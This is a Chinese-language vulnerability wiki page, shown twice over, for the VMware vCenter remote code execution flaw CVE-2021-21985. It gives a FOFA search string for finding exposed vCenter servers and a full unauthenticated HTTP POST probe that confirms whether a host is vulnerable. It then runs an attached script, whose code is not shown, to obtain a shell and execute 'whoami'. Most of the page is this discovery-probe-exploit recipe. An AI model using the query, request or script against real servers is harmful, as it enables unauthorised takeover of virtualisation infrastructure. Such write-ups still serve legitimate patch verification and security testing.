fofamini-wiki

登录白背景

源码

VMware vCenter 存在远程代码执行漏洞(CVE-2021-21985)

一、漏洞简介

VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。默认启用的 Virtual SAN Health Check 插件（vsan-h5-client.zip）/rest/*接口存在未授权访问，可利用不安全的反射调用实现 RCE。

二、影响版本

VMware vCenter

三、资产测绘

fofatitle="ID_VC_Welcome"

四、漏洞复现

POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88

{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}

发送请求包，出现isDisconnected:false即存在漏洞
jiaoben.py
使用脚本直接getshell

python3 jiaoben.py https://xxx.xxx.xxx.xx/ whoami

原文: https://www.yuque.com/xiaokp7/ocvun2/wfgb54s7m9vgf0sx

# VMware vCenter 存在远程代码执行漏洞(CVE-2021-21985)

# 一、漏洞简介
VMware vCenter Server是美国威睿（Vmware）公司的一套服务器和虚拟化管理软件。该软件提供了一个用于管理VMware vSphere环境的集中式平台，可自动实施和交付虚拟基础架构。默认启用的 Virtual SAN Health Check 插件（vsan-h5-client.zip）/rest/*接口存在未授权访问，可利用不安全的反射调用实现 RCE。

# 二、影响版本

- VMware vCenter

# 三、资产测绘

- fofa`title="ID_VC_Welcome"`

![image.png](./img/Wwp-3dAg1sp61AbC/1716017090282-f90f105e-743a-48cd-bc8c-8043d4492021-233340.png)

# 四、漏洞复现
```
POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88

{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}
```
发送请求包，出现isDisconnected:false即存在漏洞![image.png](./img/Wwp-3dAg1sp61AbC/1716018999138-94c45e5e-39eb-4be8-bbcb-f7c1d37ac9de-266673.png)
[jiaoben.py](https://www.yuque.com/attachments/yuque/0/2024/txt/29512878/1716183577394-8f34b0a7-a3a5-42ee-963b-8947cde0d821.txt?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Ftxt%2F29512878%2F1716183577394-8f34b0a7-a3a5-42ee-963b-8947cde0d821.txt%22%2C%22name%22%3A%22jiaoben.py%22%2C%22size%22%3A4123%2C%22ext%22%3A%22txt%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u120528bd-42ce-42f5-9223-6369bc28120%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22text%2Fplain%22%2C%22__spacing%22%3A%22both%22%2C%22mode%22%3A%22title%22%2C%22id%22%3A%22uafb01abf%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)
使用脚本直接getshell
```
python3 jiaoben.py https://xxx.xxx.xxx.xx/ whoami
```
![image.png](./img/Wwp-3dAg1sp61AbC/1716019158916-1affcdc2-9304-494b-8994-e9c97d33800a-291699.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wfgb54s7m9vgf0sx>